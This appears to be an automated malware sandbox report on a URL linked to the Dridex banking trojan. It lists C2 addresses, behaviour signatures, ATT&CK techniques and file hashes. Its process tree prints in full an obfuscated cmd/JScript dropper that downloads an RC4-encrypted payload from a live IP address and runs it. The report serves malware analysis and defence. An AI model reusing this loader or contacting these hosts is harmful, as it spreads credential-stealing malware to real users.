Overview

overview

10

Static

static

URLScan

urlscan

http://hillmag.xyz/

windows7_x64

1

http://hillmag.xyz/

windows7_x64

6

http://hillmag.xyz/

windows7_x64

1

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

linux_amd64

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    30-09-2021 23:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://hillmag.xyz/

  • Sample

    210930-3w5mjaafdj

Score
10/10
dridex10111botnetdiscoveryevasiontrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

185.168.130.138:443

79.172.255.198:9676

195.154.108.109:10172
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:584
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:1116
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c d5krb.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1216
            • C:\Users\Admin\AppData\Local\Temp\d5krb.exe
              d5krb.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:2936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    d302a1fb716166b280c2accd4491966e

    SHA1

    9eff2394f8616a4567f3eb895747ddf81fa68207

    SHA256

    ce29369602f384184b8fc7be24fa322fe70da4590f73921eada2cf12774a4afc

    SHA512

    c2b90c30f558518426cd0135a06dfc7d1c986635a9effffa34af80a8adaf566002d17288409b838452510212f774f5b75f2772e4acc20d7b19ad6f99751dc9ea

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    7f2382cbe0c2807fc0f4c359d350836d

    SHA1

    37d874f1f5a782a383ad9d35c6d97401d63d334e

    SHA256

    93a1d9c56ce2845275a92d89930f534032bf4ad4b6eb4bada59c7930789b1e7d

    SHA512

    d437f652e45bc7d9e2a20f38fcbec58624c0d552953a183895a84ba4f2b882173020029f54743f4bebbc75346661896e7a5cc4a76fa19099092bdc0aa9103656

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\JY06HFGL.cookie
    MD5

    536e62b4a847388ea66c5179a64b9f40

    SHA1

    123174e3b4fbf2ddc61b5b7e75fdfa5a9718d71d

    SHA256

    b6023daa49c64846b0284a976e0c88f0381ba13b09458f3fa5794c32ff5a76c6

    SHA512

    7ec8750178dcdfecac122ee396c55c00a6f512232e7080e889434db4c6ec2ff5abffc2b8c2c0a91aac7409f0b2887c0d1f38bd4c04b70aa2f803f8f4df835b0d

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LPO196OT.cookie
    MD5

    481274988af7cdcaee286221d6a61b12

    SHA1

    5dfac1a490127353a5929ecc747b1000f31967db

    SHA256

    c6310be473aef7d3b06e0c4c2eb3a30e5f7df96b6d07edaaecd2c141c9eb5577

    SHA512

    fa21fd6171c875a1dfd2ce4f77fce9a3c0dfaa0c6a91680296728fa599090a9cc81ccd0a9dcff0236aab3e86cc4644b306e74952518b2b0a917c8945612c19d8

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\d5krb.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\d5krb.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

    Download Submit
  • memory/584-117-0x0000000000000000-mapping.dmp
    Download
  • memory/1116-118-0x0000000000000000-mapping.dmp
    Download
  • memory/1216-120-0x0000000000000000-mapping.dmp
    Download
  • memory/2428-115-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2736-116-0x0000000000000000-mapping.dmp
    Download
  • memory/2936-121-0x0000000000000000-mapping.dmp
    Download
  • memory/2936-124-0x0000000000500000-0x000000000064A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2936-125-0x0000000000400000-0x00000000004F9000-memory.dmp
    Filesize

    996KB

    Download